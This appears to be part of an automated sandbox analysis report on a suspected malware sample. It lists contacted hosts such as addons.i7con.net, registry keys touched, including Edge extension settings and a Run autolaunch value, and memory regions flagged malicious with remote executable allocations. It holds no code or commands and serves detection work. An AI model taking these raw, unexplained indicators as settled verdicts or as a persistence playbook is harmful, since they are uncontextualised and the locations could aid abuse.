addons.i7con.net
United Kingdom
239.255.255.250
unknown
Reserved
23.11.231.163
unknown
United States
23.101.168.44
unknown
United States
3.163.101.92
unknown
United States
127.0.0.1
unknown
unknown
There are 15 hidden IPs, click here to show them.

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Target_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Target_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Target_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Target_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Target_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Target_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Target_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Target_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Target_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Target_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Target_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Target_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Target_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Target_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\cd738f7ec36d311b107bd6ec4b05793a
fc3dd79e7b07609d5d0d87b35c3f8091
HKEY_CURRENT_USER\SOFTWARE\cd738f7ec36d311b107bd6ec4b05793a
9F06F2D0565EA31B8A486D63B122AF45
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon
state
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\ThirdParty
StatusCodes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\ThirdParty
StatusCodes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon
state
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\StabilityMetrics
user_experience_metrics.stability.exited_cleanly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\TermReason\7508
Terminator
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\TermReason\7508
Reason
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\TermReason\7508
CreationTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
\REGISTRY\A\{f845474d-5e8f-2239-ee7d-b4001a437a90}\Root\InventoryApplicationFile\zcezeaqsuhi.exe|f0bfab4419a1d4db
ProgramId
\REGISTRY\A\{f845474d-5e8f-2239-ee7d-b4001a437a90}\Root\InventoryApplicationFile\zcezeaqsuhi.exe|f0bfab4419a1d4db
FileId
\REGISTRY\A\{f845474d-5e8f-2239-ee7d-b4001a437a90}\Root\InventoryApplicationFile\zcezeaqsuhi.exe|f0bfab4419a1d4db
LowerCaseLongPath
\REGISTRY\A\{f845474d-5e8f-2239-ee7d-b4001a437a90}\Root\InventoryApplicationFile\zcezeaqsuhi.exe|f0bfab4419a1d4db
LongPathHash
\REGISTRY\A\{f845474d-5e8f-2239-ee7d-b4001a437a90}\Root\InventoryApplicationFile\zcezeaqsuhi.exe|f0bfab4419a1d4db
Name
\REGISTRY\A\{f845474d-5e8f-2239-ee7d-b4001a437a90}\Root\InventoryApplicationFile\zcezeaqsuhi.exe|f0bfab4419a1d4db
OriginalFileName
\REGISTRY\A\{f845474d-5e8f-2239-ee7d-b4001a437a90}\Root\InventoryApplicationFile\zcezeaqsuhi.exe|f0bfab4419a1d4db
Publisher
\REGISTRY\A\{f845474d-5e8f-2239-ee7d-b4001a437a90}\Root\InventoryApplicationFile\zcezeaqsuhi.exe|f0bfab4419a1d4db
Version
\REGISTRY\A\{f845474d-5e8f-2239-ee7d-b4001a437a90}\Root\InventoryApplicationFile\zcezeaqsuhi.exe|f0bfab4419a1d4db
BinFileVersion
\REGISTRY\A\{f845474d-5e8f-2239-ee7d-b4001a437a90}\Root\InventoryApplicationFile\zcezeaqsuhi.exe|f0bfab4419a1d4db
BinaryType
\REGISTRY\A\{f845474d-5e8f-2239-ee7d-b4001a437a90}\Root\InventoryApplicationFile\zcezeaqsuhi.exe|f0bfab4419a1d4db
ProductName
\REGISTRY\A\{f845474d-5e8f-2239-ee7d-b4001a437a90}\Root\InventoryApplicationFile\zcezeaqsuhi.exe|f0bfab4419a1d4db
ProductVersion
\REGISTRY\A\{f845474d-5e8f-2239-ee7d-b4001a437a90}\Root\InventoryApplicationFile\zcezeaqsuhi.exe|f0bfab4419a1d4db
LinkDate
\REGISTRY\A\{f845474d-5e8f-2239-ee7d-b4001a437a90}\Root\InventoryApplicationFile\zcezeaqsuhi.exe|f0bfab4419a1d4db
BinProductVersion
\REGISTRY\A\{f845474d-5e8f-2239-ee7d-b4001a437a90}\Root\InventoryApplicationFile\zcezeaqsuhi.exe|f0bfab4419a1d4db
AppxPackageFullName
\REGISTRY\A\{f845474d-5e8f-2239-ee7d-b4001a437a90}\Root\InventoryApplicationFile\zcezeaqsuhi.exe|f0bfab4419a1d4db
AppxPackageRelativeId
\REGISTRY\A\{f845474d-5e8f-2239-ee7d-b4001a437a90}\Root\InventoryApplicationFile\zcezeaqsuhi.exe|f0bfab4419a1d4db
Size
\REGISTRY\A\{f845474d-5e8f-2239-ee7d-b4001a437a90}\Root\InventoryApplicationFile\zcezeaqsuhi.exe|f0bfab4419a1d4db
Language
\REGISTRY\A\{f845474d-5e8f-2239-ee7d-b4001a437a90}\Root\InventoryApplicationFile\zcezeaqsuhi.exe|f0bfab4419a1d4db
Usn
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default
media.cdm.origin_data
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PrefsLightweight
lw_13bbe73648289fe96dfa1aa1bf23b3da
HKEY_CURRENT_USER\SOFTWARE\Microsoft\EdgeUpdate\ClientState\{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}
freseenversion
HKEY_CURRENT_USER\SOFTWARE\Microsoft\EdgeUpdate\ClientState\{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}
freseen
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\Defaults
is_dse_recommended
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\Defaults
is_startup_page_recommended
HKEY_CURRENT_USER\SOFTWARE\Microsoft\EdgeUpdate\ClientState\{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}
lastrun
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowProperties\66740
WindowTabManagerFileMappingId
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Feeds
EdgeMUID
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
ahfgeienlihckogmohjhadlkjgocpleb
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
dgiklkfkllikcanfonkcabmbdfmgleag
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
fikbjbembnmfhppjfnmfkahdhfohhjmg
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
ghbmnnjooekpmoecnnnilnnbdlolhkhi
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
iglcjdemknebjbklcgkfaebgojjphkec
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
ihmafllikibpmigkcoadcmckbfhibefp
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
jdiccldimpdaibmpdkjnbmckianbfold
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
jmjflgjpcpepeafmmgdpfkogkghcpiha
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
mhjfbmdgcfjbbpaeojofohoefgiehjai
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
mhpndkmgbeollhlhekioinkiofjhnfki
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
ncbjelpjchkpbikbpkcchkhkblodoama
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
nkeimhogjdpnpccoofpliimaahmaaome
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default
prefs.preference_reset_time
HKEY_CURRENT_USER\SOFTWARE\Microsoft\EdgeUpdate\Clients\{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}\Commands\on-logon-autolaunch
Enabled
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\Profiles\Default
ShortcutName
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\Profiles\Default
ProfileErrorState
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\Profiles
EnhancedLinkOpeningDefault
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\Profiles\Default
MUID
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
ahfgeienlihckogmohjhadlkjgocpleb
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
ahokoikenoafgppiblgpenaaaolecifn
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
bhmhibnbialendcafinliemndanacfaj
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
bobbggphonhgdonfdibkfipfepfcildj
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
ceaifoolopnigfpidlheoagpheiplgii
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
cjneempfhkonkkbcmnfdibgobmhbagaj
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
dabfebgaghanlbehmkmaflipiohdimmc
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
dcaajljecejllikfgbhjdgeognacjkkp
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
dgiklkfkllikcanfonkcabmbdfmgleag
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
dmbljphlfghcnbohaoffiedmodfmkmol
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
ehlmnljdoejdahfjdfobmpfancoibmig
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
eijpepilkjkofamihbmjcnihgpbebafj
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
enkoeamdnimieoooocohgbdajhhkajko
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
fikbjbembnmfhppjfnmfkahdhfohhjmg
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
fjngpfnaikknjdhkckmncgicobbkcnle
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
gbihlnbpmfkodghomcinpblknjhneknc
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
gbmoeijgfngecijpcnbooedokgafmmji
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
gecfnmoodchdkebjjffmdcmeghkflpib
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
gekagaaiohabmaknhkbaofhhedhelemf
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
ghbmnnjooekpmoecnnnilnnbdlolhkhi
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
ghglcnachgghkhbafjogogiggghcpjig
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
hciemgmhplhpinoohcjpafmncmjapioh
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
hloomjjkinpbjldhobfkfdamkmikjmdo
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
hmlhageoffiiefnmojcgoagebofoifpl
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
iglcjdemknebjbklcgkfaebgojjphkec
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
ihmafllikibpmigkcoadcmckbfhibefp
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
jbleckejnaboogigodiafflhkajdmpcl
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
jdiccldimpdaibmpdkjnbmckianbfold
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
jlipacegilfgfpgkefbjcncbfcoeecgj
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
jmjflgjpcpepeafmmgdpfkogkghcpiha
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
jpfjdekhebcolnfkpicpciaknbgcdcbm
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
kfihiegbjaloebkmglnjnljoljgkkchm
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
khffkadolmfbdgahbabbhipadklfmhgf
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
kjncpkplfnolibapodobnnjfgmjmiaba
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
kkobcodijbdelbnhbfkkfncbeildnpie
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
kmojgmpmopiiagdfbilgognmlegkonbk
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
mhjfbmdgcfjbbpaeojofohoefgiehjai
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
mhpndkmgbeollhlhekioinkiofjhnfki
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
ncbjelpjchkpbikbpkcchkhkblodoama
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
nkbndigcebkoaejohleckhekfmcecfja
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
nkeimhogjdpnpccoofpliimaahmaaome
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
nnpnekncnhiglbokoiffmejlimgmgoam
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
ofefcgjbeghpigppfmkologfjadafddi
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
olkdlefmaniacnmgofabnpmomgcpdaip
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
olmhchkiafniffcaiciiomfdplnmklak
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
pencekojiebcjhifbkfdncgmmooepclc
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
ppnnjfpaneghjbcepgedmlcgmfgkjhah
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
ahfgeienlihckogmohjhadlkjgocpleb
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
ahokoikenoafgppiblgpenaaaolecifn
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
bhmhibnbialendcafinliemndanacfaj
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
bobbggphonhgdonfdibkfipfepfcildj
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
ceaifoolopnigfpidlheoagpheiplgii
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
cjneempfhkonkkbcmnfdibgobmhbagaj
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
dabfebgaghanlbehmkmaflipiohdimmc
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
dcaajljecejllikfgbhjdgeognacjkkp
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
dgiklkfkllikcanfonkcabmbdfmgleag
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
dmbljphlfghcnbohaoffiedmodfmkmol
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
ehlmnljdoejdahfjdfobmpfancoibmig
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
eijpepilkjkofamihbmjcnihgpbebafj
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
enkoeamdnimieoooocohgbdajhhkajko
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
fikbjbembnmfhppjfnmfkahdhfohhjmg
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
fjngpfnaikknjdhkckmncgicobbkcnle
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
gbihlnbpmfkodghomcinpblknjhneknc
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
gbmoeijgfngecijpcnbooedokgafmmji
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
gecfnmoodchdkebjjffmdcmeghkflpib
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
gekagaaiohabmaknhkbaofhhedhelemf
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
ghbmnnjooekpmoecnnnilnnbdlolhkhi
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
ghglcnachgghkhbafjogogiggghcpjig
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
hciemgmhplhpinoohcjpafmncmjapioh
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
hloomjjkinpbjldhobfkfdamkmikjmdo
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
hmlhageoffiiefnmojcgoagebofoifpl
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
iglcjdemknebjbklcgkfaebgojjphkec
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
ihmafllikibpmigkcoadcmckbfhibefp
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
jbleckejnaboogigodiafflhkajdmpcl
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
jdiccldimpdaibmpdkjnbmckianbfold
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
jlipacegilfgfpgkefbjcncbfcoeecgj
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
jmjflgjpcpepeafmmgdpfkogkghcpiha
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
jpfjdekhebcolnfkpicpciaknbgcdcbm
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
kfihiegbjaloebkmglnjnljoljgkkchm
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
khffkadolmfbdgahbabbhipadklfmhgf
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
kjncpkplfnolibapodobnnjfgmjmiaba
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
kkobcodijbdelbnhbfkkfncbeildnpie
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
kmojgmpmopiiagdfbilgognmlegkonbk
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
mhjfbmdgcfjbbpaeojofohoefgiehjai
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
mhpndkmgbeollhlhekioinkiofjhnfki
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
ncbjelpjchkpbikbpkcchkhkblodoama
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
nkbndigcebkoaejohleckhekfmcecfja
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
nkeimhogjdpnpccoofpliimaahmaaome
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
nnpnekncnhiglbokoiffmejlimgmgoam
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
ofefcgjbeghpigppfmkologfjadafddi
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
olkdlefmaniacnmgofabnpmomgcpdaip
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
olmhchkiafniffcaiciiomfdplnmklak
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
pencekojiebcjhifbkfdncgmmooepclc
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
ppnnjfpaneghjbcepgedmlcgmfgkjhah
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon
state
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\ThirdParty
StatusCodes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\ThirdParty
StatusCodes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon
state
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\StabilityMetrics
user_experience_metrics.stability.exited_cleanly
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default
software_reporter.reporting
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default
media.storage_id_salt
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default
settings_reset_prompt.last_triggered_for_startup_urls
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default
settings_reset_prompt.prompt_wave
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default
edge.services.account_id
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default
software_reporter.prompt_seed
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default
settings_reset_prompt.last_triggered_for_homepage
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default
edge.services.last_username
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default
default_search_provider_data.template_url_data
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default
safebrowsing.incidents_sent
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default
pinned_tabs
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default
search_provider_overrides
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default
edge.services.last_account_id
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default
software_reporter.prompt_version
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default
session.startup_urls
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default
session.restore_on_startup
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default
settings_reset_prompt.last_triggered_for_default_search
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default
prefs.preference_reset_time
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default
browser.show_home_button
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default
homepage
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default
homepage_is_newtabpage
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon
version
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowProperties\66740
WindowTabManagerFileMappingId
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowProperties\66740
WindowTabManagerFileMappingId
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowProperties\66740
WindowTabManagerFileMappingId
HKEY_CURRENT_USER\SOFTWARE\Microsoft\EdgeUpdate\ClientState\{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}
lastrun
HKEY_CURRENT_USER\SOFTWARE\Microsoft\EdgeUpdate\ClientState\{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}
lastrun
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon
state
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\ThirdParty
StatusCodes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\ThirdParty
StatusCodes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon
state
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\StabilityMetrics
user_experience_metrics.stability.exited_cleanly
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon
state
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\ThirdParty
StatusCodes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\ThirdParty
StatusCodes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon
state
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\StabilityMetrics
user_experience_metrics.stability.exited_cleanly
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\StabilityMetrics
user_experience_metrics.stability.exited_cleanly
There are 199 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
1DFC1CB0000
trusted library section
page read and write
 malicious
140000000
remote allocation
page execute and read and write
 malicious
1978E306000
heap
page read and write
 malicious
1DFA9511000
trusted library allocation
page read and write
 malicious
1DFB9C49000
trusted library allocation
page read and write
 malicious
140465000
remote allocation
page execute and read and write
 malicious
1DFB9994000
trusted library allocation
page read and write
 malicious
1D09B6C1000
trusted library allocation
page read and write
 malicious
1978E2D8000
heap
page read and write
 malicious
1D0AC25F000
trusted library allocation
page read and write
 malicious
1DFC1C40000
trusted library section
page read and write
 malicious
140799000
remote allocation
page execute and read and write
 malicious
1D0ABDF5000
trusted library allocation
page read and write
 malicious
1DFB97BC000
trusted library allocation
page read and write
 malicious
1978E339000
heap
page read and write
 malicious
1DFA7B16000
heap
page read and write
 malicious
7FFD9B8B3000
trusted library allocation
page execute and read and write
7FFD9B9B0000
trusted library allocation
page read and write
1D0B4161000
heap
page read and write
1BDBD600000
heap
